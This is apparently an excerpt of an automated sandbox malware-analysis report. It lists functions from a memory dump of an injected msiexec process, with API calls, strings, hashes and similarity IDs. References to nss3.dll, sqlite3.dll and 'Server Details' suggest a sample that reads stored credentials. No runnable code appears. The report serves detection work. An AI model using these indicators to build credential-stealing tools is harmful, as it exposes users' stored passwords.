                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                        Strings
                                                                                        • recovered %d pages from %s, xrefs: 004188B4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                        • String ID: recovered %d pages from %s
                                                                                        • API String ID: 985450955-1623757624
                                                                                        • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                        • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                        • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                        • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                        Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _ultoasprintf
                                                                                        • String ID: %s %s %s
                                                                                        • API String ID: 432394123-3850900253
                                                                                        • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                        • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                        • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                        • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                        Function 00409901 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00409919
                                                                                        • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendmemset
                                                                                        • String ID: N\@
                                                                                        • API String ID: 568519121-3851889168
                                                                                        • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                        • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                                                                        • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                        • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                                                                        Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                        • sprintf.MSVCRT ref: 0040909B
                                                                                          • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                          • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                          • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                          • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                          • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                          • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                          • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                        • String ID: menu_%d
                                                                                        • API String ID: 1129539653-2417748251
                                                                                        • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                        • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                        • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                        • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                        Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _msizerealloc
                                                                                        • String ID: failed memory resize %u to %u bytes
                                                                                        • API String ID: 2713192863-2134078882
                                                                                        • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                        • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                        • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                        • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                        Function 004097FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                        • strrchr.MSVCRT ref: 00409808
                                                                                        • _mbscat.MSVCRT ref: 0040981D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileModuleName_mbscatstrrchr
                                                                                        • String ID: _lng.ini
                                                                                        • API String ID: 3334749609-1948609170
                                                                                        • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                        • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                        • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                        • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                        Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                          • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                          • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                        • _mbscat.MSVCRT ref: 004070FA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _mbscat$_mbscpystrlen
                                                                                        • String ID: sqlite3.dll
                                                                                        • API String ID: 1983510840-1155512374
                                                                                        • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                        • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                        • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                        • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                        Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileString
                                                                                        • String ID: A4@$Server Details
                                                                                        • API String ID: 1096422788-4071850762
                                                                                        • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                        • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                        • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                        • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                        Function 0042C821 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                        • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                        • memset.MSVCRT ref: 0042C932
                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memset
                                                                                        • String ID:
                                                                                        • API String ID: 438689982-0
                                                                                        • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                        • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                        • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                        • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                        Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • strlen.MSVCRT ref: 0040849A
                                                                                        • memset.MSVCRT ref: 004084D2
                                                                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,68127B60,?,00000000), ref: 0040858F
                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,68127B60,?,00000000), ref: 004085BA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLocalmemcpymemsetstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 3110682361-0
                                                                                        • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                        • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                        • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                        • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                        Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                        • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                        • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                        • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID:
                                                                                        • API String ID: 3510742995-0
                                                                                        • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                        • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                        • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                        • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                        Function 0040998E Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099A3
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099CC
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099ED
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 00409A0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@$memset
                                                                                        • String ID:
                                                                                        • API String ID: 1860491036-0
                                                                                        • Opcode ID: 53a709b0ebb70c131a26b1f3e55d335129ca60e454a525cf22a7fedf29ded436
                                                                                        • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                                                        • Opcode Fuzzy Hash: 53a709b0ebb70c131a26b1f3e55d335129ca60e454a525cf22a7fedf29ded436
                                                                                        • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                                                        Function 0040796E Relevance: 5.1, APIs: 4, Instructions: 63stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • strlen.MSVCRT ref: 0040797A
                                                                                        • free.MSVCRT ref: 0040799A
                                                                                          • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                          • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                          • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                        • free.MSVCRT ref: 004079BD
                                                                                        • memcpy.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,0044357F,00000000,?,?,00000000,0044386F,?,?), ref: 004079DD
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$memcpy$mallocstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 3669619086-0
                                                                                        • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                        • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                        • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                        • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59